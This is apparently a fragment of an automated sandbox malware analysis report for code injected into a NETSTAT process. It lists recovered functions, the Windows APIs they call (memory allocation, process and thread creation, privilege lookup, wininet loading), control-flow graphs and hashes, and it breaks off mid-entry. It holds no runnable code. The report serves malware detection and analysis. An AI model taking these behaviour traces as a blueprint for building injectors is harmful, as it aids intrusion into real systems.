                Similarity
                • API ID: FileRead
                • String ID: 1J}
                • API String ID: 2738559852-4274715835
                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                • Instruction ID: 7046a2fd59f096de8a687380432b317de226dc56a0abce889c55938529606574
                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                • Instruction Fuzzy Hash: F8F0A4B2210208ABCB14DF89DC85EEB77ADEF8C754F158249BA1D97241D630E8118BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 305 7da45a-7da476 306 7da47c-7da489 NtClose 305->306 307 7da477 call 7daf30 305->307 307->306
                APIs
                • NtClose.NTDLL(PM},?,?,007D4D50,00000000,FFFFFFFF), ref: 007DA485
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID: PM}
                • API String ID: 3535843008-4171156331
                • Opcode ID: eddde8f201e6ab0ebdf7677234046481fb6db6f204c8d7b1b20ec5e5fd326a9c
                • Instruction ID: 262eef978130a18ab26162eee9c75703e089671b48506c582fd212579bc626e5
                • Opcode Fuzzy Hash: eddde8f201e6ab0ebdf7677234046481fb6db6f204c8d7b1b20ec5e5fd326a9c
                • Instruction Fuzzy Hash: 94E08CB2210210BBDB20EBE48C45EE77BA8EF45750F144499FA889B242C130E60087D0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 308 7da460-7da489 call 7daf30 NtClose
                APIs
                • NtClose.NTDLL(PM},?,?,007D4D50,00000000,FFFFFFFF), ref: 007DA485
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID: PM}
                • API String ID: 3535843008-4171156331
                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                • Instruction ID: 38df07c6fed115cc92585007e83689679d8e2ce40b4e57708955487f87892f9d
                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                • Instruction Fuzzy Hash: CDD01776610214BBD710EB98CC89EA77BACEF48760F15449ABA189B242C530FA0086E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,007C2D11,00002000,00003000,00000004), ref: 007DA549
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                • Instruction ID: 14e9f32638ce86875b564bfc4df77c8200899d6291b66140c42c06fbf570c261
                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                • Instruction Fuzzy Hash: EFF015B2210208ABCB14DF89CC81EAB77ADEF88754F118149FE0897241C630F811CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 518d5813df52a99bb589b621ca3a8758b6e16f320f4a8703b46af70ee3ba927c
                • Instruction ID: a2c3efb9282bfd52901a74b76e5b46a716b826fff9377957a9481f3a903dcea0
                • Opcode Fuzzy Hash: 518d5813df52a99bb589b621ca3a8758b6e16f320f4a8703b46af70ee3ba927c
                • Instruction Fuzzy Hash: DA90027521144812D100A59D54586460005D7E0341F91D021A5014595ECBA588917171
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: a33024f9841f94cbedd70396a3d1e2d62e058eb90fe035dbde9373969b2f1157
                • Instruction ID: 70c567ac5bbde512bb77cc7b4ab908c84606a0c14b9b004f86c4974e27d70a43
                • Opcode Fuzzy Hash: a33024f9841f94cbedd70396a3d1e2d62e058eb90fe035dbde9373969b2f1157
                • Instruction Fuzzy Hash: A190026D22344412D180B15D545860A0005D7D1242FD1D425A0005598CCE5588696361
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 078bd8f4991087879366a0edc97e847dd941011e3f89dc01e1660ad6fec1ac54
                • Instruction ID: d093df841dab78a6c62404b0b1d58c2c24abd66330262ac74db7eaf327eefed9
                • Opcode Fuzzy Hash: 078bd8f4991087879366a0edc97e847dd941011e3f89dc01e1660ad6fec1ac54
                • Instruction Fuzzy Hash: DD90027532158812D110A15D84547060005D7D1241F91C421A0814598D8BD588917162
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: ce606d43e03c0165d032e42989283a179587d4a569c3d371b3f50f4b3d9d3f9a
                • Instruction ID: dba5cd200947147b505116db852d8ed751f8688d5d23b7db741e0acd41690c09
                • Opcode Fuzzy Hash: ce606d43e03c0165d032e42989283a179587d4a569c3d371b3f50f4b3d9d3f9a
                • Instruction Fuzzy Hash: A290027521144C12D180B15D445464A0005D7D1341FD1C025A0015694DCF558A5977E1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: d02e274d16ac046a5aea72cab9c2a0f9b92918a29c534455fdc7760617b06a97
                • Instruction ID: fe8e68fc38d1e78159e909207aecf44a4eda7234687f0a1c7ba90fc1d689aa7b
                • Opcode Fuzzy Hash: d02e274d16ac046a5aea72cab9c2a0f9b92918a29c534455fdc7760617b06a97
                • Instruction Fuzzy Hash: 92900265221C4452D200A56D4C64B070005D7D0343F91C125A0144594CCE5588616561
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 0c5ecd0ff4e2a644d9737d8499a49560cf63ee3efeafb48987750f3aa993e937
                • Instruction ID: 05639f4024afc7203f65b0d1738fe1ae17a6cc5a5bf9d282fb2b3799b2737145
                • Opcode Fuzzy Hash: 0c5ecd0ff4e2a644d9737d8499a49560cf63ee3efeafb48987750f3aa993e937
                • Instruction Fuzzy Hash: D890027521548C52D140B15D4454A460015D7D0345F91C021A00546D4D9B658D55B6A1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 067e38556e8e77fbf0e14ac80d06d386337e9b102cd1d7a844b2caa8ac185165
                • Instruction ID: 9eda8a00cad1387e957e072f0319c70de9c9c2e1982103673fea5ef8fc6b71e5
                • Opcode Fuzzy Hash: 067e38556e8e77fbf0e14ac80d06d386337e9b102cd1d7a844b2caa8ac185165
                • Instruction Fuzzy Hash: 4C9002752114CC12D110A15D845474A0005D7D0341F95C421A4414698D8BD588917161
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 0b7acad8e80c23e4ad5c728625753c3ce60fb99138d24f8c9df364a49343f5d2
                • Instruction ID: 0732e78e77b8ddd37b38d2b9f86eb7eeb7cdb94221b0768c80edf729631e4a49
                • Opcode Fuzzy Hash: 0b7acad8e80c23e4ad5c728625753c3ce60fb99138d24f8c9df364a49343f5d2
                • Instruction Fuzzy Hash: 4E90027521144C52D100A15D4454B460005D7E0341F91C026A0114694D8B55C8517561
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: eb7d1ce84720b1792cefc1baf30de197185cae431402526a88b9fff64eaaf8d8
                • Instruction ID: 37b332ebae66103deaff566fda399d8f02656c5d7f80185c3257b2e84409cc2b
                • Opcode Fuzzy Hash: eb7d1ce84720b1792cefc1baf30de197185cae431402526a88b9fff64eaaf8d8
                • Instruction Fuzzy Hash: F89002B521144812D140B15D44547460005D7D0341F91C021A5054594E8B998DD576A5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 86359cfd2e81fdad12f1dcf9e639ea5e7574348e4b31f103ac790bbc4a66842b
                • Instruction ID: 8287a6ce1a5da461bccc6ecd61b1554b1e1eb475355095022bda8d899d9d744a
                • Opcode Fuzzy Hash: 86359cfd2e81fdad12f1dcf9e639ea5e7574348e4b31f103ac790bbc4a66842b
                • Instruction Fuzzy Hash: AC900269221444130105E55D07545070046D7D5391391C031F1005590CDB6188616161
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: d7014bdbd8cbb1313a316b1d01c798079ba6a337deec9667ac74eda08dd495b2
                • Instruction ID: e15aa8bb6ed62a8f0c8e358452d77316467b88c6bc3d6e146566e4b70d67bcf7
                • Opcode Fuzzy Hash: d7014bdbd8cbb1313a316b1d01c798079ba6a337deec9667ac74eda08dd495b2
                • Instruction Fuzzy Hash: B49002A535144852D100A15D4464B060005D7E1341F91C025E1054594D8B59CC527166
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 23eb2d67ddb515c5990656571faf02a4ba1129ab58cb6607ea009cf1c6235e00
                • Instruction ID: cc6f2cef59f315e61246cc3cac413a1343bfd5bf0899799592ad7f29d7190c71
                • Opcode Fuzzy Hash: 23eb2d67ddb515c5990656571faf02a4ba1129ab58cb6607ea009cf1c6235e00
                • Instruction Fuzzy Hash: 3F9002A5212444134105B15D4464616400AD7E0241B91C031E10045D0DCA6588917165
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 379c54a4c908e82e366ca24988d3be49a108e62987ae4b021216285bf8116714
                • Instruction ID: 74a6e6cd2decc80382b99340635852ebfa4e32a34ed62440940e23abcbf39824
                • Opcode Fuzzy Hash: 379c54a4c908e82e366ca24988d3be49a108e62987ae4b021216285bf8116714
                • Instruction Fuzzy Hash: 8B90027521144823D111A15D45547070009D7D0281FD1C422A0414598D9B968952B161
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: df2b177db5bd14a0c47223fc51721f53215553dba1e9aaafd0859834b8a04fcb
                • Instruction ID: a8e72ded2dac34098dbdb4954c889849475a9820971e8a52779ffd6b0b41c123
                • Opcode Fuzzy Hash: df2b177db5bd14a0c47223fc51721f53215553dba1e9aaafd0859834b8a04fcb
                • Instruction Fuzzy Hash: A8900265252485625545F15D44545074006E7E02817D1C022A1404990C8A669856E661
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 243 7d9050-7d9092 call 7dbd10 246 7d916c-7d9172 243->246 247 7d9098-7d90e8 call 7dbde0 call 7cacf0 call 7d4e50 243->247 254 7d90f0-7d9101 Sleep 247->254 255 7d9166-7d916a 254->255 256 7d9103-7d9109 254->256 255->246 255->254 257 7d910b-7d9131 call 7d8c70 256->257 258 7d9133-7d9154 call 7d8e80 256->258 262 7d9159-7d915c 257->262 258->262 262->255
                APIs
                • Sleep.KERNELBASE(000007D0), ref: 007D90F8
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: net.dll$wininet.dll
                • API String ID: 3472027048-1269752229
                • Opcode ID: b34c0d465a51e7e09efc842e9443ab23cdcf2c180a7208150cf323320d8806fb
                • Instruction ID: 022ffc69baf781ed6573f7e7c462872938689d661a8a0329702e310792b60a89
                • Opcode Fuzzy Hash: b34c0d465a51e7e09efc842e9443ab23cdcf2c180a7208150cf323320d8806fb
                • Instruction Fuzzy Hash: 893170B2500745FBC724DF64CC89F67B7B8BB48B00F10811EFA2A5B345DA34A650CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 263 7d9046-7d904e 264 7d8fdb-7d8fe1 263->264 265 7d9050-7d9092 call 7dbd10 263->265 268 7d916c-7d9172 265->268 269 7d9098-7d90e8 call 7dbde0 call 7cacf0 call 7d4e50 265->269 276 7d90f0-7d9101 Sleep 269->276 277 7d9166-7d916a 276->277 278 7d9103-7d9109 276->278 277->268 277->276 279 7d910b-7d9131 call 7d8c70 278->279 280 7d9133-7d9154 call 7d8e80 278->280 284 7d9159-7d915c 279->284 280->284 284->277
                APIs
                • Sleep.KERNELBASE(000007D0), ref: 007D90F8
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: net.dll$wininet.dll
                • API String ID: 3472027048-1269752229
                • Opcode ID: b8a0d20894dc62e7958a81d935734cab8589ee002bad3fd3e448db68ab567353
                • Instruction ID: c3605769635d5c99d9ee802f546ffacabe86c01931add3fbf05c2b2b34321b7b
                • Opcode Fuzzy Hash: b8a0d20894dc62e7958a81d935734cab8589ee002bad3fd3e448db68ab567353
                • Instruction Fuzzy Hash: AC318172A00305BBC724EF68D889B67B7B8EB48700F10815EFA1D5B345D679A550CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 302 7da640-7da671 call 7daf30 RtlFreeHeap
                APIs
                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,007C3AF8), ref: 007DA66D
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID: .z`
                • API String ID: 3298025750-1441809116
                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                • Instruction ID: 7312881595307f6bdc109c3c5e81bb04819d6a510bb55f9916bf68f89747a8a8
                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                • Instruction Fuzzy Hash: 23E012B1210208ABDB18EF99CC49EA777ACEF88750F018599FA085B242C630E9108AB0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 299 7da600-7da631 call 7daf30 RtlAllocateHeap
                APIs
                • RtlAllocateHeap.NTDLL(6E},?,007D4CAF,007D4CAF,?,007D4536,?,?,?,?,?,00000000,00000000,?), ref: 007DA62D
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID: 6E}
                • API String ID: 1279760036-2082338545
                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                • Instruction ID: 7b8a220ffcaff4bee4a800883d11b5779dc5a2eff304c428fefda614a59b01f4
                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                • Instruction Fuzzy Hash: 80E012B1210208ABDB14EF99CC45EA777ACEF88654F118599FA085B242C630F9118AB0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007C836A
                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 007C838B
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID:
                • API String ID: 1836367815-0
                • Opcode ID: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                • Instruction ID: 18bb45ab6193f7622591a49feceec5cbd4831cb411592be6900e2a1c0eec03f5
                • Opcode Fuzzy Hash: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                • Instruction Fuzzy Hash: C7018431A80229B7E721A6949C07FBE776C5B40F51F05011DFF04BA2C1EAA8690547F6
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 007CAD62
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                • Instruction ID: c6c507412573bb21709702f1b1aa1b8c05fa9a209fa6b098ecb2b952b5b5a452
                • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                • Instruction Fuzzy Hash: BE011EB5E4020DFBDB10EAA4DC46F9DB3789B54309F0045AAAA0997641F635EB14CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007DA704
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: CreateInternalProcess
                • String ID:
                • API String ID: 2186235152-0
                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                • Instruction ID: af4365ecee4ca2e7864200afeb1c549e9129f2896b49f7b19cc05b05be8fe3f0
                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                • Instruction Fuzzy Hash: 6E01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 007DA704
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: CreateInternalProcess
                • String ID:
                • API String ID: 2186235152-0
                • Opcode ID: 2b05a09e3c50a4ca40192954c48c2de2ebf7f7a2eb55a46449b6669d8ff8ba56
                • Instruction ID: be0a070001297f5f214f35aa0e4d2a1880b1fc4f7f9b8f30171b851baa6ac9b5
                • Opcode Fuzzy Hash: 2b05a09e3c50a4ca40192954c48c2de2ebf7f7a2eb55a46449b6669d8ff8ba56
                • Instruction Fuzzy Hash: 1001F2B2215109BFCB44DF88DC80DEB7BB9AF8C314F158258FA5997205C630E851CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,007CF050,?,?,00000000), ref: 007D91BC
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: 88443eb0ee72a2f98bcfdb8adc4b35d91a5b470e417f6c8a54e1f74412ecdaae
                • Instruction ID: f264941bb0fc72b321d20411b4d822a4ae09ebae42ebe4d5edb60c8cad606f3d
                • Opcode Fuzzy Hash: 88443eb0ee72a2f98bcfdb8adc4b35d91a5b470e417f6c8a54e1f74412ecdaae
                • Instruction Fuzzy Hash: FEE06D333802047AE2206599AC02FA7B3AC9B81B20F140026FA0DEB2C1D59AF80142A4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetErrorMode.KERNELBASE(00008003,?,007C8D14,?), ref: 007CF6FB
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: a1d6d8215c0178793dee70496e8379bfbcda511b055425cecd44daa52295f724
                • Instruction ID: d8ad697b21f74c6390e922a9be84c6f2ca562a4fd528d21011f223f4cedc26df
                • Opcode Fuzzy Hash: a1d6d8215c0178793dee70496e8379bfbcda511b055425cecd44daa52295f724
                • Instruction Fuzzy Hash: 79E0C2316802053EEB11EBB49C53FB93BA65B65784F0D00B8F58DE73D3E965D0018620
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,?,007CF1D2,007CF1D2,?,00000000,?,?), ref: 007DA7D0
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: LookupPrivilegeValue
                • String ID:
                • API String ID: 3899507212-0
                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
